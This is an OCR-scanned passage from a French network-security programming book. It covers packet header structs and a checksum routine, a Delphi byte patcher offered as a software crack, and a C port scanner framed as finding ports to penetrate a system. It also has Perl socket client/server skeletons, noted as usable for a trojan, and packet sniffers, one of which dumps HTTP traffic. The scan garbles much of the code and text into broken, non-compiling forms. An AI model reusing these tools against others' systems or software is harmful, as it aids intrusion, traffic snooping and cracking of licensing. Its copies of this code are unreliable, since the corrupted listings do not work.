
// 


Type de service 


unsigned 


short 


tot len; 


// 


Longueur du paquet 


unsigned 


short 


id; 


// 


identif icateur 


unsigned 


short 


offset ; 


// 


Offset du Fragment 


unsigned 


char 


ttl; 


// 


TTL 


unsigned 


char 


protocol ; 


// 


Protocole 


unsigned 


short 


checksum; 


// 


Cheksum 


unsigned 


int 


saddr ; 


// 


IP source 


unsigned 


int 


daddr ; 


// 


IP de destinataire 



}; 



TCP 

Voici un paquet TCP : 



port source 


port destination 


numero de sequence 


accuse de reception 


decalage , , , ~ 
, , reservee urg ack psn rst syn tin 
donnees 


fenetre 


somme de controle (checksum) 


pointeur de donnees 
urgentes 


options 


remplissage (padding) 


donnees 



Voici la structure associee au paquet TCP : 

typedef struct tcphdr 
{ 

unsigned short sport; 
unsigned short dport; 



// port source 

// port destination 
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unsigned int seqnum; 
unsigned int acknum; 
unsigned char dataoffset; 
unsigned char flags; 
unsigned short windows; 
unsigned short checksum; 
unsigned short urgpointer; 



// numero de sequence 
// accuse de reception 
// decalage des donnees 
// flags 
/ / f enetre 
// checksum 

// pointeur de donnees 
urgentes 



ICMP 



Voici un paquet ICMP : 



Type 


Code 


Cheksum 


ID 


Numero de sequence 


Donnees 



Voici la structure associee au paquet ICMP : 

typedef struct icmphdr 
{ 



unsigned 


char 


type; 


// 


Type 


unsigned 


char 


coder- 


// 


Code 


unsigned 


short 


checksum; 


// 


Checksum 


unsigned 


short 


id; 


// 


ID 


unsigned 


short 


sequence; 


// 


numero de sequence 


unsigned 


long 


t ime stamp ; 


// 


timestamp 



} ; 



Pratique 

Pour pouvoir utiliser les raw sockets, il va falloir remplir les membres des structures 
avec les bons parametres puis placer la structure dans un tableau de caracteres et 
envoyer le tout avec sendto( ). 

Voici un exemple de remplissage d'une structure TCP : 



tcp->sport 
tcp->dport 
tcp->seqnum 
tcp->acknum 
tcp->dataof f set 
tcp->f lags 
tcp->window 
tcp-> checks urn 
tcp->urgpointer 



= htons (xx) ; 
= htons (xx) 
= htonl (xx) ; 
= htonl (xx) ; 
= (x) « x; 
= OxOxx; 
= htons (xx) ; 
= xxxxx; 
= 0; 
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xx. . .xx : sont a remplacer par les elements que Ton souhaite. 



Avant de terminer ce chapitre, nous allons voir une fonction qui permet de calculer le 
cheksum : un element qui ne peut etre choisi au hasard. 

Voici le code : 

u short checksum (u short *addr, int len) { 

register int nleft = len; 

register u short *w = addr; 

register u short answer; 

register int sum = 0; 

while (nleft > 1) { 
sum += *w++; 
nleft -= 2; 

} 

if (nleft == 1) { 

u_short u = 0; 

* (u_char *) (&u) = * (u_char *)w; 
sum += u; 

} 

sum = (sum >> 16) + (sum & Oxffff ) ; 
sum += (sum >> 16); 
answer = -sum; 
return (answer) ; 

} 
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Partie IV : 
Developpement 
d'utilitaires de securite 
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Dans cette partie, nous allons etudier ensemble comment developper certains outils 
pouvant servir a securiser des systemes et reseaux mais aussi a pirater. 

Chacun de ces programmes ont ete developpes par l'auteur pour d'autres projets et ne 
sont done que des extraits de programmes plus complets et fonctionnels. 

L 'utilisation de ces programmes dans un environnement autre que ceux pour lequel 
ils ont ete crees risque de ne pas fonctionner. 

4 programmes vont vous etre presentes : 

- un logiciel qui patch des octets d'un programme (en Delphi), 

- un scanner de ports basique, 

des squelettes de serveurs et clients TCP et UDP, 
des sniffers. 
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Un crack 



Si vous avez bien suivi la partie du livre consacree a la securite informatique, vous 
devriez normalement savoir ce qu'est un crack (on dit aussi patch). Mais le re-dire ne 
tuera personne ! ! ! 

Un crack (ou patch) est un petit programme qui va modifier certains octets d'un 
programme a des offsets precis dans le but de modifier son comportement dans un 
environnement donne ou lorsqu'une action survient. 

Les cracks sont generalement utilises pour deplomber des logiciels commerciaux. Le 
mini crack developpe en language Delphi a pour but de faire comprendre au lecteur 
comment il est possible de modifier des octets d'un programme compile et non de 
dormer un programme de base servant a pirater des logiciels (a mo ins qu'ils 
appartiennent a celui qui teste ce crack). 



var F : file of Byte; 
A : Byte; 

begin 

assignfile(F , 'fichier.exe'); 
Reset (F) ; 

A := $ [hexa_voulu] ; 
seek (F, $ [offset] ) ; 

Write (F, A) ; 

closefile (F) ; 

end; 



Tout au long de 1' explication, j'utiliserai le mot « fichier » a la place du mot 
programme car les methodes utilisees peuvent aussi etre applicables a des fichiers 
(bien que cela ne servirait a rien de patcher des fichiers). 

En premier, on declare les variables qui vont etre utilisees dans la suite du code, file 
of Byte et Byte sont des types qu'il n'est pas necessaire de commenter car meme 
si c'est de l'anglais, c'est tres comprehensible. 

On a ensuite le code meme qui est toujours entoure de begin et end; 

La premiere procedure va associer la variable fichier fb au fichier a ouvrir. Utiliser 
cette procedure est obligatoire avant d'avoir un acces sequentiel au fichier a ouvrir. 



assignfile(F , 'fichier.exe'); 
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La deuxieme instruction ouvre le fichier en lecture. Comme vous allez le remarquer, 
pour acceder au fichier, on utilise la variable fichier. 



Reset (FB) ; 



La troisieme instruction va affecter a la variable A, l'hexa de la commande que Ton 
souhaite mettre a la place de celle existante. 



A := $ [hexa voulu] ; 



La quatrieme instruction va placer un pointeur sur l'offset a modifier. 



seek (F, $ [offset] ) ; 



La cinquieme instruction va ecrire notre hexa a l'offset ou se trouve le pointeur de 
l'instruction precedente. C'est ici que l'on patche le programme. 



Write (F, A) ; 



Pour finir, il faut fermer le fichier ouvert et patche. 



closefile (F) ; 



Le code presente ne patch qu'un octet a la fois, pour en pacther d'autres il suffit de 
repeter les instructions le nombre de fois necessaire. 
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Scanner de ports 



Les scanners de ports sont tres importants pour savoir par quel port penetrer un 
systeme. Pour plus d' informations sur le scan des ports, retournez aux premiers 
chapitres de la partie securite informatique. 

Pour que les scanners de ports determinent quels ports sont ouvert sur un systeme, ils 
essaient de s'y connecter a l'aide d'un socket. Si la connexion a reussie, le port est 
ouvert, sinon il est ferme. 

Voici le code source : 



include <stdio.h> 
include <stdlib.h> 
include <netinet/in.h> 
include <netdb.h> 
include <sys/types.h> 
include <sys/socket.h> 

int main(int argv,char*argc[]) 

{ 

int socket,i; 

struct sockaddr in paq; 
struct hostent *dest; 

if(argv <= 1 1 1 argv > 4) 
{ 

printf("Probleme dans le passage des arguments.\n\n"); 

printf("%s [nomd'hote] [port de depart] [port d arrive] : permet de scanner les 
ports de l'hote cible",argc[0]); 

} 

if(argc>3) 
{ 

dest =gethostbyname(argc[l]); 

if(dest = = NULL) 

{ 

dest =gethostbyaddr(argc [ 1 ] ,4, AFINET) ; 

} 

paq.sinfamily = AFINET; 

paq.sinaddr = *((struct in addr *)paq -> h addr); 

start = strtol(argc[2],(char**)NULL,10); 
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if(start = = NULL) 

{ 

start = atoi(argc[2]); 

} 

end = strtol(argc[3],(char**)NULL,10); 

if(end = = NULL) 

{ 

end = atoi(argc[3]); 

} 

} 

for(i = start; i <= end; i++) 
{ 

paq.sin_port = htons(i); 

socket = socket(AF_INET,SOCK_STREAM,0); 

if((connect(socket,(struct sockaddr*)&paq,sizeof( struct sockaddr))) = = 0) 

{ 

printf("Le port %i est ouvert sur %s",i,dest); 
} 

close(socket); 

} 

1 



En premier, on inclut les fichiers d'en-tetes dont on a besoin. 



include <stdio.h> 
include <stdlib.h> 
include <netinet/in.h> 
include <netdb.h> 
include <sys/types.h> 
include <sys/socket.h> 



Puis on debute la boucle principale et on declare les structures que Ton va utiliser. 



int main(int argv,char*argc[]) 

{ 

int socket,i; 

struct sockaddr in paq; 
struct hostent *dest; 



Ensuite, on teste le nombre d'arguments que l'utilisateur a passe au programme. Si il 
y en a moins de 1 ou plus de 4, alors il y a une erreur et on montre a l'utilisateur 
comment passer les arguments. 



if(argv <= 1 1 1 argv > 4) 
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{ 

printf("Probleme dans le passage des arguments.\n\n"); 

printf("%s [nomd'hote] [portdedepart] [portdarrive] : permet de scanner les 
ports de l'hote cible",argc[0]); 

_J 



Si par contre l'utilisateur a bien passe les arguments au programme, on va analyser 
les arguments et affecter leurs valeurs a des variables pour que le programme puissent 
les traiter aisement. 



if(argc>3) 

{ 

dest = gethostbyname(argc[l]); 

if(dest = =NULL) 

{ 

dest =gethostbyaddr(argc [ 1 ] ,4, AFINET); 

} 

paq.sinfamily = AFINET; 

paq.sinaddr = *((struct inaddr *)paq -> haddr); 

start = strtol(argc[2],(char**)NULL,10); 

if(start = = NULL) 

{ 

start = atoi(argc[2]); 

} 

end = strtol(argc[3],(char**)NULL,10); 

if(end = = NULL) 

{ 

end = atoi(argc[3]); 

} 

_J 



gethostbyname() va nous permettre d'avoir l'adresse IP de la machine a scanner. Si 
gethostbyname() n'a pas reussi a determiner l'adresse IP alors on utilise une autre 
fonction gethostbyaddr() . 

paq.sin addr = *((struct in addr *)paq -> h addr); permet de mettre dans la 
structure du paquet sin l'adresse IP de la machine a scanner. 

Les fonctions strtol() et atoi() permettent de convertir la chaine passee en argument 
en un entier. 

Pour finir, on va utiliser une boucle for qui va permettre de scanner les ports que 
l'utilisateur veut. Dans cette boucle, on va placer dans la structure le port que Ton 
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scanne, puis on cree un socket. Si on arrive a se connecter au port de la machine a 
l'aide du socket cree, on en conclut que le port est ouvert. 



for(i=start; i<=end; i++) 
{ 

paq.sin_port = htons(i); 

socket = socket(AF_INET,SOCK_STREAM,0); 

if((connect(socket,(struct sockaddr*)&paq,sizeof( struct sockaddr))) = = 0) 

{ 

printf("Le port %i est ouvert sur %s",i,dest); 
} 

close(socket); 

} 

} 
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Serveur TCP 



Voici le code source : 



use Socket; 
use strict; 



$sv_adr=""; 
$sv_port = "xx"; 
$sv_proto = "tcp"; 

print "Taper le nombre maximal de connexion que le serveur doit accepterAn"; 
$conmax = <STDIN>; 

$adr = gethostbyname($sv_adr); 

if(!adr) 

{ 

$adr = gethostbyaddr($sv_adr, AFINET); 
unless(defined(adr)) 

{ 

$adr = INADDRANY; 

} 

} 

$proto = getprotobyname($sv_proto); 

if(!$proto) 
{ 

$proto = getprotobynumber($sv_proto); 

} 

$port = $sv_port; 

if(!port) 

{ ' 

Sport = getservbyname($sv_port, $proto); 

} 

socket(SERV_SOCK, PF INET, SOCKSTREAM, $proto) || die "Probleme de 
socket:$!\n"; 

setsockopt(SERV_SOCK, SOL SOCKET, SO REUSEADDR, pack("l",l)) || die 
"On ne peut mettre d'options sur le socket."; 

bind(SERV_SQCK, sockaddr_in($port, $adr)) || die "L'association n'a pas pu avoir 
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lieu."; 

listen(SERV_SOCK, $conmax) || die "II y a eu une erreur ! ! !"; 

while(l) 

{ 

accept(CHI_SOCK, SERVSOCK); 

$dest = getpeername(CHI_SOCK) || die "II y a eu une erreur ! ! !"; 
($dport, $dadr) = unpack_sockaddr_in($dest); 
$ip_dest = inet_ntoa($dadr); 

if(fork != 0) 
{ 

shutdown(CHI_SOCK, 2); 

} 

print "La connection du client $dadr sur le serveur $adr par le port $port du serveur 
a ete accepteV; 

shutdown(SERV_SOCK, 2); 

select(CHISOCK); 
$1 = 1 

(Ici est le service que fournit le serveur) 

J 



En premier, on va inclure les modules que Ton va utiliser. 



use Socket; 
use strict; 



Puis on demande a l'utilisateur de choisir le nombre maximum de connexions que 
doit accepter le serveur. 



print "Taper le nombre maximal de connexion que le serveur doit accepterAn"; 
Sconmax = <STDIN>; 



Ensuite,on va essay er de determiner, a l'aide des fonctions gethostbyname() et 
gethostbyaddrQ, l'adresse IP du serveur TCP auquel doit se connecter le client. 



$adr = gethostbyname($sv_adr); 

if(!adr) 

{ 

$adr = gethostbyaddr($sv_adr, AF INET); 
unless(defined(adr)) 

{ 

$adr = INADDRANY; 

1 
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} 



On fait de meme pour determiner le protocole a l'aide des fonctions 
getprotobyname() et getprotobynumber(). 



$proto = getprotobyname($sv_proto); 

if(!$proto) 

{ 

$proto = getprotobynumber($sv_proto); 

_J 



Et pour determiner le port du serveur auquel le client doit se connecter. 



$port = $sv_port; 

if(!port) 

{ 

Sport = getservbyname($sv_port, $proto); 

_J 



Quand tout cela est fini, on va creer le socket, lui mettre des options (grace a la 
fonction setsockopt()), l'associer a un nom (grace a la fonction bind()), et le mettre 
en ecoute (grace a la fonction listenQ). 



socket(SERV_SOCK, PFINET, SOCKSTREAM, $proto) || die "Probleme de 
socket:$ !\n"; 

setsockopt(SERV_SOCK, SOL SOCKET, SOREUSEADDR, pack("l",l)) || die 
"On ne peut mettre d'options sur le socket."; 

bind(SERV_SOCK, sockaddr_in($port, $adr)) || die "L'association n'apas pu avoir 
lieu."; 

listen(SERV SOCK, Sconmax) || die "II y a eu une erreur ! ! !"; 

Maintenant, on va s'occuper de la maniere dont le serveur va s'occuper des clients. 
On code une boucle infinie. 



while(l) 

J 



On accepte une connexion sur le socket, et creer un nouveau descripteur de socket. 



accept(CHI SOCK, SERV SOCK); 



On va essayer d'avoir des informations sur le client qui se trouve a l'autre extremite 
du socket : comme son adresse IP et son port. 



$dest = getpeername(CHI_SOCK) || die "II y a eu une erreur ! ! !"; 
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($dport, $dadr) = unpack_sockaddr_in($dest); 
$ip_dest = inet_ntoa($dadr); 



Puis, on duplique le processus et le processus pere referme le socket CHI SOCK car 
il en a plus besoin. En effet, c'est le processus fils qui dialoguera avec le client. 



if(fork != 0) 

{ 

shutdown(CHI_SOCK, 2); 

J 



On affiche un petit message a l'utilisateur du serveur pour lui dire que la connexion 
est acceptee. 



print "La connection du client $dadr sur le serveur $adr par le port $port du serveur 
a ete accepteW; 



Comme le processus fils n'a plus besoin du socket de base, il peut done le fermer. 



shutdown(SERV SOCK, 2); 



Maintenant, le serveur peut rendre le service pour lequel il a ete cree. 

On va seulement selectionner le socket comme sortie standard pour pouvoir ecrire 
facilement des messages au client a l'aide de la fonction print. 



select(CHISOCK); 
$1 = 1 

} 
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Client TCP 



D'abord quelques informations theoriques. 

Les clients sont des logiciels qui vont se connecter a un serveur et vont profiter des 
services qu'offre le serveur. 

Voici le code source : 



use Socket; 
use strict; 



$sv_adr = "xx"; 
$sv_port = "xx"; 
$sv_proto = "tcp"; 



$adr = gethostbyname($sv_adr); 

if(!adr) 

{ 

$adr = gethostbyaddr($sv_adr, AF INET); 
unless(defined(adr)) 

{ 

$adr = INADDR_ AN Y ; 

} 

} 

$proto = getprotobyname($sv_proto); 

if(!$proto) 

{ 

$proto = getprotobynumber($sv_proto); 

} 

$port = $sv_port; 

if(!port) 
{ 

Sport = getservbyname($sv_port, $proto); 

} 

socket(CLIENT_SOCK, PF INET, SOCKSTREAM, $proto) || die "Probleme de 
socket: $!\n"; 
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connect(CLIENT_SOCK, sockaddr_in($port, $adr)) || or die "Probleme lors de la 
connexion"; 

select(CLIENTSOCK); 
$| = 1 

(Ici ce pour quoi le client a ete developpe. ATTENTION, pour ecrire des messages 
au serveur, utiliser l'instruction print suivi du message.) 

shutdown(CLIENT SOCK, 2); 



En premier, on va inclure les modules que Ton va utiliser. 



use Socket; 
use strict; 



Ensuite on va essay er de determiner, a l'aide des fonctions gethostbyname() et 
gethostbyaddrQ, l'adresse IP du serveur TCP auquel doit se connecter le client. 



$adr = gethostbyname($sv_adr); 

if(!adr) 

{ 

$adr = gethostbyaddr($sv_adr, AF INET); 
unless(defined(adr)) 

{ 

$adr = INADDRANY; 

} 

_J 



On fait de meme pour determiner le protocole a l'aide des fonctions 
getprotobyname() et getprotobynumber(). 



$proto = getprotobyname($sv_proto); 

if(!$proto) 

{ 

$proto = getprotobynumber($sv_proto); 

_J 



Et pour determiner le port du serveur auquel le client doit se connecter. 



$port = $sv_port; 

if(!port) 
{ 

Sport = getservbyname($sv_port, $proto); 

_J 
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Quand tout est pret, on va creer un socket et on le connecte au socket en ecoute du 
serveur. 



socket(CLIENT_SOCK, PFINET, SOCKSTREAM, $proto) || die "Probleme de 
socket:$!\n"; 

connect(CLIENT_SOCK, sockaddr_in($port, $adr)) || or die "Probleme lors de la 
connexion"; 



Les 2 instructions suivantes selectionnent le serveur comme sortie standard pour 
pouvoir ecrire facilement des messages au serveur a l'aide de la fonction print. 



select(CLIENTSOCK); 

$1 = 1 



Maintenant, vous devez coder ce pour quoi le serveur a ete cree. 
Quand le client est finit, il faut fermer le socket. 



shutdown(CLIENT SOCK, 2); 



Ce code doit pouvoir marcher pour toutes les situations, on peut done s'en servir pour 
creer des applications clients en tout genre (aussi bien client http, que client d'un 
troy en). 
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Serveur UDP 



Avec le protocole UDP, on ne peut pas vraiment parler de serveur, car les 2 parties ( 
clients et serveurs ) ne font qu'envoyer les paquets sans etablire de connexions. 

Voici le code source : 



use Socket; 
use strict; 



$sv_adr=""; 
$sv_port = "xx"; 
$sv_proto = "udp"; 

$adr = gethostbyname($sv_adr); 

if(!adr) 

{ 

$adr = gethostbyaddr($sv_adr, AF INET); 
unless(defined(adr)) 

{ 

$adr = INADDRANY; 

} 

} 

$proto = getprotobyname($sv_proto); 

if(!$proto) 

{ 

$proto = getprotobynumber($sv_proto); 

} 

$port = $sv_port; 

if(!port) 

{ 

Sport = getservbyname($sv_port, $proto); 

} 

socket(SERV_SOCK, PF INET, SOCKDGRAM, $proto) || die "Probleme de 
socket:$ !\n"; 

bind(SERV_SOCK, sockaddr_in($port, $adr)) || die "L'association n'apas pu avoir 
lieu."; 
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while(l) 

{ 

(Ici ce pour quoi le serveur a ete programme, ATTENTION, on envoie et recoit des 
donnees a l'aide des fonction send() et recv()) 

J 

En premier, on va inclure les modules que Ton va utiliser. 



use Socket; 
use strict; 



Ensuite,on va essay er de determiner, a l'aide des fonctions gethostbyname() et 
gethostbyaddrQ, l'adresse IP du serveur UDP. 



$adr = gethostbyname($sv_adr); 

if(!adr) 

{ 

$adr = gethostbyaddr($sv_adr, AF INET); 
unless(defined(adr)) 

{ 

$adr = INADDR_ AN Y ; 

} 

_J 



On fait de meme pour determiner le protocole a l'aide des fonctions 
getprotobyname() et getprotobynumber(). 



$proto = getprotobyname($sv_proto); 

if(!$proto) 

{ 

$proto = getprotobynumber($sv_proto); 

_J 



Et pour determiner le port du serveur auquel le client doit se connecter. 



$port = $sv_port; 

if(!port) 

{ 

Sport = getservbyname($sv_port, $proto); 

_J 



Quand tout est pret, on va creer un socket et on l'associe a un nom. 
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socket(SERV_SOCK, PF INET, SOCK DGRAM, $proto) || die "Probleme de 
socket:$!\n"; 

bind(SERV_SOCK, sockaddr_in($port, $adr)) || die "L'association n'apas pu avoir 
lieu."; 



Puis on code ce pour quoi le serveur a ete developpe. 



while(l) 

{ 

(Ici ce pour quoi le serveur a ete programme, ATTENTION, on envoie et recoit des 
donnees a l'aide des fonction send() et recv()) 

J 



222 



223 



Client UDP 



Voici le code source : 



use Socket; 
use strict; 



$sv_adr=""; 
$sv_port = "xx"; 
$sv_proto = "udp"; 

$adr = gethostbyname($sv_adr); 

if(!adr) 

{ 

$adr = gethostbyaddr($sv_adr, AF INET); 
unless(defined(adr)) 

{ 

$adr = INADDRANY; 

} 

} 

$proto = getprotobyname($sv_proto); 

if(!$proto) 

{ 

$proto = getprotobynumber($sv_proto); 

} 

$port = $sv_port; 

if(!port) 
{ 

Sport = getservbyname($sv_port, $proto); 

} 

socket(SERV_SOCK, PF INET, SOCK DGRAM, $proto) || die "Probleme de 
socket:$ !\n"; 

while(<>) 
{ 

(Ici ce pour quoi le client a ete programme. ATTENTION, on envoie et recoit des 
donnees a l'aide des fonction sendQ et recvQ) 
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i 



En premier, on va inclure les modules que Ton va utiliser. 



use Socket; 
use strict; 



Ensuite,on va essay er de determiner, a l'aide des fonctions gethostbyname() et 
gethostbyaddrQ, l'adresse IP du serveur UDP. 



$adr = gethostbyname($sv_adr); 

if(!adr) 

{ 

$adr = gethostbyaddr($sv_adr, AF INET); 
unless(defined(adr)) 

{ 

$adr = INADDRANY; 

} 

_J 



On fait de meme pour determiner le protocole a l'aide des fonctions 
getprotobyname() et getprotobynumber(). 



$proto = getprotobyname($sv_proto); 

if(!$proto) 

{ 

$proto = getprotobynumber($sv_proto); 

_J 



Et pour determiner le port du serveur auquel le client doit se connecter. 



$port = $sv_port; 

if(!port) 
{ 

Sport = getservbyname($sv_port, $proto); 

_J 



Quand tout est pret, on cree un socket. 



socket(SERV_SOCK, PF INET, SOCKDGRAM, $proto) || die "Probleme de 
socket: $!\n"; 



Pour finir, on code ce pourquoi le serveur a ete cree. 
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while(o) 
{ 

(Ici ce pour quoi le client a ete programme. ATTENTION, on envoie et recoit des 
donnees a l'aide des fonction send() et recv()) 

_J 
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sniffers 



Un sniffer est un logiciel qui va capturer les paquets reseaux passant par 1' interface 
reseau choisie. 

II existe pleins de sniffers a telecharger sur internet ou a acheter mais ce chapitre vous 
propose de developper votre sniffer a l'aide du language C et Perl. 

Pour le language C, il faudra aussi packet.dll fournit avec la SDK de winpcap, si vous 
voulez utiliser le sniffer sous windows. 

Bon, voici le code source : 



include <stdlib.h> 
include <stdio.h> 
include <pcap.h> 

int main() 

{ 

char erreur[PCAP_ERRBUF_SIZE]; 
pcap t *paq; 
char dev; 

struct pcap_pkthdr head; 
const unsigned char *paquet; 
int a,b; 

struct etherheader * header; 
s = sizeof(struct ether header); 
bpf_u_int32 adr, masque; 

dev = pcaplookupdev(erreur); 

paq = pcap_open_live(dev,1500,l,1000,erreur); 

if(!paq) 

{ 

printf("Problemes lors de l'ouverture du descripteur de paquetsV); 
return -1; 

} 

pcap_lookupnet(dev,&adr,&masque,erreur); 

if(adr) 

{ 

printf("Voici l'adresse de l'interface par defaut: %x\n",adr); 

} 
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if(masque) 

{ 

printf("Voici le masque de reseau de l'interface par defaut: %x\n",masque); 

} 

printf("Voici les paquets sniffesV); 

while(l) 

{ 

paquet = pcap _next(paq,&head); 

if(head.caplen < s) continue; 

header = (struct etherheader *)paquet; 

for(a=0; a<ETH_ALEN; a++) 

printf("%s%02x",a==0 ? "" : ":",header->ether_shost[a]); 

for(a=0; a<ETH_ALEN; a++) 

printf("— >%s%02x",a==0 ? "" : ":",header->ether_dhost[a]); 

printf("Le paquet sniffe est de type: %d\n",header->ether_type); 

} 

} 



En premier, on commence par inclure les fichiers d' en-tetes. 



include <stdlib.h> 
include <stdio.h> 
include <pcap.h> 



Ensuite, on debute la boucle principale et on declare les variables et structures qui 
seront utilisees dans le programme. 



int main() 

{ 

char erreur[PCAP_ERRBUF_SIZE]; /* C'est ici que sont situees les erreurs. 

PCAP ERRBUF SIZE est la taille de ce 
buffer et est defini das pcap.h.*/ 
pcap t *paq; /* C'est le descripteur de paquets utilise par pcap_open_live*/ 
char dev; /* C'est ici que sera stocke l'interface par defaut */ 
struct pcap_pkthdr head; /* C'est une structure qui contient les en-tetes de paquets */ 
const unsigned char *paquet; /* C'est ici que sera contenu le paquet capture */ 
int a,b; /* Ce sont des variables tests et sans importances */ 

struct ether header *header; /* C'est une structure qui contient les 
en-tetes des paquets ethernet */ 
s = sizeof(struct ether_header); /* C'est la taille des en-tetes ethernet */ 
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bpf_u_int32 adr, masque; /* Ce sont des entiers speciaux qui sont remplis par la 
fonction pcaplookupnet */ 



La premiere fonction retourne le nom d'une interface reseau pouvant etre utilisee par 
pcapopenlive. 



dev = pcaplookupdev(erreur); 



La suivante permet d'obtenir un descripteur de paquets pour pouvoir capturer les 
paquets passant sur le reseau. 



paq = pcap_openrive(dev, 1500, 1,1 000,erreur); 



Le premier if permet de tester la reussite ou non de pcap_open_live(). 



if(!paq) 

{ 

printf("Problemes lors de l'ouverture du descripteur de paquetsV); 
return -1; 

_J 



La fonction suivante permet d'obtenir l'adresse reseau et le masque de reseau de 
1' interface reseau choisie. On retrouve nos variables speciales qui ne doivent pas 
avoir de valeurs avant d'etre passees en arguments a la fonction. 



pcap_lookupnet(dev,&adr,&masque,erreur); 



Les if suivant testent la reussite de pcap_lookupnet et retournent les informations 
que contiennent les 2 variables speciales. 



if(adr) 

{ 

printf("Voici l'adresse de l'interface par defaut: %x\n",adr); 

} 

if(masque) 

{ 

printf("Voici le masque de reseau de l'interface par defaut: %x\n",masque); 

_J 



Pour traiter les paquets circulant sur le reseau, on ouvre une boucle infinie. 



while(l) 

J 



Puis on utilise la fonction pcap_next() pour capturer un paquet. 



paquet = pcap_next(paq,&head); 
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Et on affiche les informations du paquets pour qu'elles soient vues par l'utilisateur. 



if(head.caplen < s) continue; 

header = (struct etherheader *)paquet; 

for(a=0; a<ETH_ALEN; a++) 

printf("%s%02x",a==0 ? "" : ":",header->ether_shost[a]); 

for(a=0; a<ETH_ALEN; a++) 

printf("— >%s%02x",a==0 ? "" : ":",header->ether_dhost[a]); 

printf("Le paquet sniffe est de type: %d\n",header->ether_type); 

} 

} 



Voici, on vient de developper un sniffer basic mais qui, normalement, marche. Pour 
Pameliorer, on pourrait ajouter un code qui afficherait les statistiques de capture des 
paquets. 

De plus on a pas dote le sniffer d'une fonction arretant la capture. 

Maintenant, on va voir 2 sniffers differents, programmes en Perl. lis ne seront pas 
commentes et vous aurez comme exercice de le faire a partir de tout ce qu'on a vu 
dans ce livre. Apres cela, vous serez a meme de developper vos propres sniffers en C, 
en Perl et dans d'autres languages car vous aurez compris comment les sniifers 
fonctionnent. 



1 sniffer : 



use strict; 
use English; 

use ExtUtils::testlib; 
use Net::Pcap; 

// declarations // 

my($dev, $pcap_t, $pcap_dumper_t, $err, $filter, $strf, $mask, $net, $res, $paq, 
$lnet); 

my $dumpfile = "-"; 

// ici, c'est une routine // 

sub process_pkt { 

my($user, $hdr, $pkt) = @_; 
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if (($user ne "khaalel") or !defined($hdr) or !defined($pkt)) { 

print("Probleme avec Les arguments passes a la fonction\n"); 
print("Probleme avec les donnees de l'utilisateur\n") if ($user ne "khaalel"); 
print("Probleme avec les en-tetes du paquetV) unless (defined($hdr)); 
print("Probleme avec les donnees du paquetV) unless (defined($pkt)); 
exit 0; 

} 

Net::Pcap::dump($pcap_dumper_t, $hdr, $pkt); 

} 

// i e debut: des trues de reseau // 

print("Quel est le protocole dont vous voulez sniffer les paquets?\nVous avez le choix 

entre tcp, ip et udp\n"); 

$strf=<STDIN> 

$dev = Net::Pcap::lookupdev(\$err); 

$lnet = Net::Pcap::lookupnet($dev, \$net, \$mask, \$err); 

if(lnet = = 0) { 

print("Voici quelques informations sur votre interface reseauV); 
print("Voici l'adresse de l'interface reseau: $net\n"); 
print("Voici l'adresse du masque de reseau: $mask\n); 
} else { 

print("Erreur avec Net::Pcap::lookupnet\n); 

} 

$pcap_t = Net::Pcap::open_live($dev, 1500, 1, 0, \$err); 

unles (defined($pcap_t)) { 
print("Erreur de Net::Pcap::open_live\n"); 
exit 0; 

} 

$res = Net::Pcap::compile($pcap_t, \$filter, $strf, 0, $mask); 

if($result = = -l) { 
print("Erreur avec Net::Pcap::compile\n"); 
exit 0; 

} 

$res = Net::Pcap::setfilter($pcap_t, $filter); 

if($result = = -l) { 
print("Erreur avec Net::Pcap::setfilter\n"); 

exit 0; 
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} 

// on chope les paquets // 



while ($paq = Net::Pcap::next($pcap_t, \%hdr)) { 
$pcap_dumper_t = Net::Pcap::dump_open($pcap_t, $dumpfile); 

unless (defined($pcap_dumper_t)) { 

print("Erreur avec Net::Pcap::dump_open\n"); 
exit 0; 

} 

Net::Pcap::loop($pcap_t, -1, \&process_pkt, "khaalel"); 
Net: :Pcap: :dump_close($pcap_dumper_t); 

} 

Net::Pcap::close($pcap_t); 



2 eme sniffer : 



use Net::RawIP; 
use Socket; 

$a = new Net::RawIP; 
$pcap = $a->pcapinit("ethO", 

"proto Wtcp and ( dst port 80 or dst port 8080)", 1500,30); 
loop $pcap,-l,\&dumpit,\@a; 

sub dumpit { 

$a->bset(substr($_[2],14)); 
($ipsrc,$ipdst,$source,$dest,$data) = $a->get( 
{ ip => [qw(saddr daddr)], 
tcp=>[qw(data source dest)]} 

); 

print inet_ntoa(pack("N",$ipsrc))," [$source] -> ", 
inet_ntoa(pack("N",$ipdst)). M [$dest]\n"; 

print "$data"\n"; 

_ii 
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Partie V : 
Annexes 



Cette derniere partie a en meme temps un role de conclusion (avec le chapitre sur les 
principes importants de securite) mais introduit aussi de nouvelles notions que vous 
pourrez completer avec d'autres livres traitant des sujets presentes. 
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Principes de securite 



Dans ce chapitre, nous allons voir ensemble comment minimiser les problemes dues 
aux pirates informatiques. Nous allons dans un premier temps voir les traces que nous 
laissons derriere nous apres avoir surfe sur internet et comment les enlever, puis nous 
allons voir 2 types d'attaques pouvant etre portees envers les navigateurs. Dans un 
deuxeme temps, nous allons voir comment se securiser en local grace a des IDS, des 
firewall, des antivirus, et des architectures reseau securisees... 

Pour finir, nous allons voir comment mener une bonne politique de securite, aussi 
bien en entreprise, en petit reseau local ou en famille. Ce chapitre est completement et 
totalement oriente securite des systemes et des personnes. 



traces du Web : 
les traces locales : 

adresses des sites visites : 

Elles sont contenus dans la barre d' adresses et permettent de retourner sur un 
site sans retaper son adresse. 

Pour visiter un site sans que l'adresse ne figure dans la barre d'adresse, il vous 
faut aller sur ce site a l'aide de Ouvrir du menu Fichier. 
Pour effacer les adresses contenues dans la barre deroulante de la barre 
d'adresses, il vous suffit d'aller dans Outils/Options Internet/Contenu/Saisie 
semi-automatique et d'effacer les formulaires et mots de passe. 
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3 Google - Microsoft Internet Explorer 



Fichier Edition Affichage Pave 



-|g|x| 



General | Securile| Confidentialite Conlenu ] Connexions! Programmes | Avance) 



^j/T Internet qui pent etre visualise sur cet ordinateur 



Le controle d'acces vous permet de controler le type de conlenu 
Activer... 



Utiliser les certificats pour vous identifier clairement, ainsi que les 
autorites de certification et le; editeurs. 



Informations personnels 



~Xy La saisie semi-automatique rtocl e le: j ^ |M „ r ni-autnmatique I 

J entrees precedentes et suggeie des I I 

' correspondances. 



L'Ass'istant Profit Microsoft stocke vos 
informations personnels. 




~3 &o 



■ O'P.ilf li--'H'.:irll'T;irr- 



phones C Pages : France 

lie - Goonle.com in English 

ueil 

>ar Google : 3.083,324,852. 



•£ Internet 



J 



3 Google - Microsoft Internet Explorer 



Fichier Edition Affichage Favoris Outlls 



Adresse http://v- ' 



